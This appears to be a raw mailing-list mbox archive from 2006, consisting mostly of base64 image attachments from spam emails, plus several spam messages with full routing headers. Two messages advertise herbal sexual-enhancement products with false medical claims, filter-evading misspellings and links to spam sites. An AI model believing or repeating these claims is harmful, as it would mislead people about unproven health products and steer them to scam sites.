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 pExKpVxKpmxKp3xKqIxKqTzHgAAAOw== ------=_NextPart_000_0012_01C6A416.F178330E Content-Type: image/gif; name="underclassman.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhkgB/AcYAAP66vO60ummGpXSKp0Z6n6mcrv25vMGls1Z/okl7oFuBokN5n1B9oLehsOu0 uhZpmCdvm1yBo5+ZrYiRqWGDo/26vMKlsjx3nqecr6udr+ayuEB4n/m4vCtxm22HpT53nk58ofS3 u4qRqlmAooqSquKpsNylrrmisdqkrViAoipwm9+nr92mrpmXrDp1nn+OqGyHpfu5vPq4ul6Co/W3 u0V5oOCor1F9oUF4n0h6oJmXrdCeqHZmgI91i9ijq4xziaCAk2hdeqiFlph7j3tpgsGVobiPnZV4 jfGytve2udWhqoZwh/y5u66Jmf25u8qapc2cpuuvtPS0t/i2uW9hfbCKmuOqsOasse2vtLmQnva1 ubWNnH1qg8eYo+mts5p8kLqQnu6wtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA AAAAkgB/AQAH/oAAgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2u r7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn 6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAMKHEiwoMGDCBMqXDgtgAABA94RKGAg0QEECRQsYNCg kYMHEDxBeFBoZEmSwCI8kJBoAoWKFQY8KNAIpEiUg0wS0vnLwoMLiTBkGKThwYaaITvxFLQUQFNe AR7gXMThQQeknjokHaS1UFdgH7cuKqoAkQMPED6AsAkghAgC/iA6jNAAgIJUEnQBZOgQsQQDAgso BBi04CqhwoUQAzvwwEMjAwMgmDgU4sIDCwAMsD3xAAUAnxQAcOhweVCFFBVBqOBQdMWgFAQKwZYd G9iIC4MTOTghAYGAvIZIPJgwiC2LARWrGhYuYJCFFoJ+CroAXMCIQtaxXwe2wMHYBhJAuBh6aEPn 4mIFaU5a9EHuAXlHYi70AgZ9+4TqB8v9WapUF4bEMMID5BEig1QhoDeIARZg0AJbAMywEgA0NCeI cA+0UAEhJLxQSIcfekhMCBaUWOIhPh1VSFQPbBgdezW40IANEHK2AAAN0KTegw+kkKAgEpBQSJBD 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 ------=_NextPart_000_0012_01C6A416.F178330E-- From [email protected] Tue Jul 11 07:18:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75486 invoked from network); 11 Jul 2006 07:18:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jul 2006 07:18:26 -0000 Received: (qmail 84963 invoked by uid 500); 11 Jul 2006 07:18:26 -0000 Delivered-To: [email protected] Received: (qmail 84948 invoked by uid 99); 11 Jul 2006 07:18:26 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO pool-71-120-182-252.aubnin.dsl-w.verizon.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 11 Jul 2006 00:18:26 -0700 Received: from shopworn. bottom-line.pallet.pravda.es ([161.129.204.104] helo=farm-house.mail.desty.org) by smtp4.desty.org with esmtp id 2A509j-0371FN-00; Tue, 11 Jul 2006 04:14:39 -0400 Message-Id: <[email protected]> Sender: [email protected] Date: Tue, 11 Jul 2006 12:08:39 +0400 In-Reply-To: Your message of "Tue, 11 Jul 2006 06:09:39 -0200." <[email protected]> From: "Ernesto Hargrove" <[email protected]> To: [email protected] Subject: Fwd: HI X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Sensationall revoolution in medicine! E''nlarge your p''enis up to 10 cm or up to 4 inches! Its h'erbal solution what hasnt side effect, but has 100% guaranted results! Dont lose your chance and but know wihtout doubts, you will be impressed with results! Clisk here: http://shapeupslimdown.net bitten calamity coffee-mill convect creon snoopy bach horse-cloth hillside eradicate stromberg henchmen allotted liechtenstein tailor hap From [email protected] Tue Jul 11 07:39:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89520 invoked from network); 11 Jul 2006 07:39:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jul 2006 07:39:12 -0000 Received: (qmail 14367 invoked by uid 500); 11 Jul 2006 07:39:11 -0000 Delivered-To: [email protected] Received: (qmail 14360 invoked by uid 99); 11 Jul 2006 07:39:11 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO user-10873if.cable.mindspring.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 11 Jul 2006 00:39:11 -0700 Received: from counterpoise.anu.many.au ([161.129.204.104 ] helo=anu.honshu.au) by smtp8.incestuous.co with esmtp id 1A5Ys6-900181-49 Message-ID: <[email protected]> Sender: [email protected] X-Mailman-Version: 2.0.1 Date: Tue, 11 Jul 2006 13:29:40 +0500 From: "Letitia Cobb" <[email protected]> To: [email protected] Subject: Skype goes PayPal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Icrease Your S''exual Desire and S''perm volume by 500% L'onger o''rgasms - The longest most intense o''rgasms of your life Multiple o''rgasms - Cum again and again S'PUR-M is The Newest and The Safest Way 100% N''atural and No Side Effects - in contrast to well-known brands. Experience three times longer o''rgasms World Wide shipping within 24 hours Clisk here http://www.mycredittools.com seductive prophetic introversion setup bivalve accuse silent fritz briton cranelike dodecahedral cern alginate analogous sidewall emittance From [email protected] Wed Jul 12 15:12:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60142 invoked from network); 12 Jul 2006 15:12:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Jul 2006 15:12:10 -0000 Received: (qmail 31451 invoked by uid 500); 12 Jul 2006 15:12:10 -0000 Delivered-To: [email protected] Received: (qmail 31448 invoked by uid 99); 12 Jul 2006 15:12:10 -0000 X-ASF-Spam-Status: No, hits=4.1 required=10.0 tests=EXTRA_MPART_TYPE,HTML_IMAGE_ONLY_08,HTML_MESSAGE,MIME_HTML_MOSTLY,MPART_ALT_DIFF X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO caching6-true.asianet.co.th) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 12 Jul 2006 08:12:00 -0700 Received: from [161.129.204.104] (helo=yaw.mkac) by caching6-true.asianet.co.th with smtp (Exim 4.43) id 1G0gMF-0008RT-PA; Wed, 12 Jul 2006 22:10:35 +0700 Message-ID: <[email protected]> From: "Caleb Irwin" <[email protected]> To: <[email protected]> Subject: subservient Date: Wed, 12 Jul 2006 22:08:20 +0700 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0019_01C6A5FF.DB216458" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1158 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_0019_01C6A5FF.DB216458 Content-Type: multipart/alternative; boundary="----=_NextPart_001_001A_01C6A5FF.DB216470" ------=_NextPart_001_001A_01C6A5FF.DB216470 Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_001A_01C6A5FF.DB216470 Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2800.1158" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_001A_01C6A5FF.DB216470-- ------=_NextPart_000_0019_01C6A5FF.DB216458 Content-Type: image/gif; name="font.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhmgKDAecAANq9vsOxl8Cwks62qNm9vq+nc66mc6mkar6ujs22p8u1pM22qci0oKGfXZOY RbCndqylb66mdc+3q8+4rLeqgse0nde8usaym62lcrmshpycU7qsh7ishbGoeKahZsGwlMSxmJib TZmbT8SymNe7ucezntO5ssKxlqOhYMm0odq9vcKwlamjabWqgLSpfaijabKoes22qLOpetC4rNW7 tq+mdNa7uNC3rZaZSaCfW9i9vNe7uK2mcdm9vbGoeb6vj7qth8q1oa2mcsSymtm8vMCwkZqcUZaa S9m8u8m1o7ytjLaqgLSpftG4rrargdi8usCvkciznpiaTZ2dV6WiZJSYRsu1ps+3rLishLmshbCn d7aqgbirg5qbUJeaS5+fW5WYR7God5+eWa+nddO5sdK5sL6ukLWpf5aZSr2ui7OpfK2lcLaqf7+v kKmja6ejZ7msh6mka9G4r6aiZbWpfqukbcKwlJ+eW72ujLSqfr2ujbCneKWhZNi8u6ukbqylcKWh Y6KgX9G5sKejaM63qtS6tNW6trSpfLOofMe0oK2lcZibT5qcUrKoeaeiZqKgXqGgXsq0o5OYRpyd Vcy2pqShYp6eV8Wymsq0opWZSKCfXKGfXJSYRbutiqKgXZydVKulbryti8y1pcGwk7ergrytitG5 rsy2pb+vjqOgYqeiZ9K5sbutiLmrhde8uaWiZbqsicq1o9W6tMaznMCvktC4rZibTqahY5eaTMaz m863qKqlbZycVaSgYJSZR9W6tbKoe5ucU8SxmaOhYZaaSsu1paGfXrutiaeiaKOgYNa7t52dVsm0 osqvnta6ttq8vdC1q4d1Foh2GJJ+LLqifs6ypLujf497JZSBMZ2IQ5eDN8WrlJF9KdK2rcitmox6 IYp4HKiRV8SqkpiDN4p3G5aCNMyxotG1q6WPU457JKCKSIh1F8etmcetlrmhfZF+K8Cmiot4HsCn i4d2F5+JRot5H8munL2khI17I4h3Gr6lhcqvndC0qZB9KMitmcCniSwAAAAAmgKDAQAI/gABCBxI sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjyBDihxJsqTJkyhTqlzJsqXLlzBjypxJs6bN mzhz6tzJs6fPn0CDCh1KtKjRo0iTKl3KtKnTp1CjSp1KtarVq1izat3KtavXr2DDih1LtqzZs2jT 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 